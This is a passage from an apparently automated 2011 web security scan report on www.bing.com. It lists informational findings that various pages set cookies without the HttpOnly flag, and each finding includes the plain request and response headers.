Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57381
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:53:10 GMT
Last-Modified: Sat, 29 Jan 2011 23:53:10 GMT
X-BM-TraceID: ee663d132ace4420b9eab1478d59e8be
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001605
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:10 GMT
Connection: close
Set-Cookie: BID=234f29943060401f9ea3fd8c0fccd2b9; path=/local
Set-Cookie: CID=d7ba30d0ced2493187723ae5e97a11c0; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=1/29/2011 11:53:10 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _SS=SID=9C78E9D32BAB47298AA4173498A90C8F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce83ec72017dc49e5ac26803c481780a7; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:10 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

17.419. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: aa4bb9bcb1bd4ee1b0f7f47adb778554
X-Ve-Server: CPK-01401-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: CPKM001401
Date: Sun, 30 Jan 2011 17:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=4FDEC46FE84D47C7A27357A4B60C2F21; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cb39404c1e43b486e8819f4088dc7362c; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:44 GMT; domain=.bing.com; path=/
Content-Length: 117670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

17.420. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 4921bce1e14044759548958ceb90d967
X-Ve-Server: EWR-01612-20110113.409-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
Date: Sun, 30 Jan 2011 17:06:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=A542DD3C69694894BF4BE6BD7321BB59; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca4184cfc9d4f4cccad735eb747233d7c; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621026&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:06:51 GMT; domain=.bing.com; path=/
Content-Length: 117393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

17.421. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43672
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01612
X-AspNet-Version: 2.0.50727
X-BM-Srv: EWRM001612
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:06 GMT
Connection: close
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _SS=SID=A21BB79701BC4D8A8674B6637A0C1148; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c5a0f31712a284b0fb357b1ff693d5880; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:06 GMT; domain=.bing.com; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

17.422. http://www.bing.com/msnhomepagehistory.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /msnhomepagehistory.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /msnhomepagehistory.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011
PST

17.423. http://www.bing.com/news/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:02:39 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296406958; domain=.bing.com; path=/
Set-Cookie: _SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/


17.424. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61044
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:04:12 GMT
Connection: close
Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

17.425. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 17:03:46 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/
Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/


17.426. http://www.bing.com/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:52:05 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296345125; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/


17.427. http://www.bing.com/sck

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /sck

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sck HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:31 GMT
Connection: close
Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/

Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011
PST

17.428. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?FORM=FOXSP HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US&FORM=FOXSP
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 01:52:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _HOP=I=1&TS=1296352332; domain=.bing.com; path=/
Set-Cookie: _SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/
Content-Length: 0


17.429. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 116
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sat, 29 Jan 2011 23:53:27 GMT
Connection: close
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/

Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011
PST

17.430. http://www.bing.com/search/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml"
Date: Sun, 30 Jan 2011 01:52:13 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/


17.431. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 93192
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:52 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:53 GMT
Connection: close
Set-Cookie: _SS=SID=D762CB0D516241079F4B337C6DF4AD2D; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c022f29fb83dd41979e53da7917adbbcf; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:53 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.432. http://www.bing.com/shopping/bird-feeders/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/bird-feeders/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:39 GMT
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=C5B30FDE5AF1459BB45DF470E55CE4D3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c47521b9f211b4590b705c63c8b0cb105; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:40 GMT; domain=.bing.com; path=/
Content-Length: 82892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

17.433. http://www.bing.com/shopping/healthy-cooking/r/151

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/healthy-cooking/r/151

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

